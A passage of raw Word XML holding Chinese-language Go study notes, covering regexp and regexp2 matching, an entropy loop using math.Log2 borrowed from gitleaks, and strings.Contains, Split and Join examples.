        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ReplaceAllString </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用来替换所有匹配的字符串，返回一个源字符串的拷贝。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B62345D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="017FCC93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA11DE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="130510A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="341" w:name="_Toc159779797"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github.com/dlclark/regexp2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（可以前视断言）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="341"/>
    </w:p>
    <w:p w14:paraId="445C48CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://github.com/dlclark/regexp2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2361EFE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3CA443" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该库不保证时间复杂度，接口也与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相异。但是可以支持比较复杂的正则表达式语法，如前视断言。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5476A582" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B86023" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果您想从单个输入字符串中找到多个匹配项，您应该使用该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FindNextMatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法。例如，要实现类似于以下的功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>regexp.FindAllString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4D1ED8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BA50F2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func regexp2FindAllString(re *regexp2.Regexp, s string) []string {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5643E87E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>var matches []string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063B1DFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>m, _ := re.FindStringMatch(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA4230" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for m != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC9E5A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>matches = append(matches, m.String())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7C3D0A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>m, _ = re.FindNextMatch(m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3E8EC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F7987E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return matches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A208D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A391B1C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD1CB46" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="342" w:name="_Toc159779798"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>embed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="342"/>
    </w:p>
    <w:p w14:paraId="6A702EEB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="343" w:name="_Toc159779799"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:bookmarkEnd w:id="343"/>
    </w:p>
    <w:p w14:paraId="6CC4DC30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57401014" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FB5A5CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A6C82D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="344" w:name="_Toc159779800"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>math</w:t>
      </w:r>
      <w:bookmarkEnd w:id="344"/>
    </w:p>
    <w:p w14:paraId="475A0EE2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>math.Log2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F9D834" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中计算</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为底数代码如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE83681" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for _, count := range charCounts {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7FD71D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>freq := float64(count) * invLength</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456C7516" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>entropy -= freq *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> math.Log2(freq)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD4A900" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3564674D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67DBCA04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E1DB82" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74AF052E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7966B8C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="345" w:name="_Toc159779801"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="345"/>
    </w:p>
    <w:p w14:paraId="74CADED6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.51cto.com/u_13280061/3127405</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D3BB65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C8CAB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strings.Contains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：查找子串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20158ABA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7577B68B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>strings.Contains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(scanner.Text(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA2DC73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"exhaustive rename detection was skipped") ||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEFD542" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>strings.Contains(scanner.Text(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D528A2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"inexact rename detection was skipped") ||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598498A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>strings.Contains(scanner.Text(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE13BA6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"you may want to set your diff.renameLimit") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BA283F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA6C3AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>log.Warn().Msg(scanner.Text())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AD353D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE02EE4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>log.Error().Msg(scanner.Text())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F73B079" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>errEncountered = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14461562" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAF1B27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB19D1B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E4EAE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strings.Split</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：切割</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34146E72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip := "192.168.31.129"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDDCCAE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>slice  := strings.Split(ip,".")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E01EAB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>newIp := strings.Join(slice,"?")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A95DDC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strings.Join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：切片组合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4269BB70" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip := "192.168.31.129"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D488E9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">slice  := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>strings.Split</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(ip,".")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13939EC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">newIp := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>strings.Join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(slice,"?")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213E5936" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF13332" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1346096A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E3F1EA" w14:textId="2E0E0F59" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="346" w:name="_Toc159779802"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
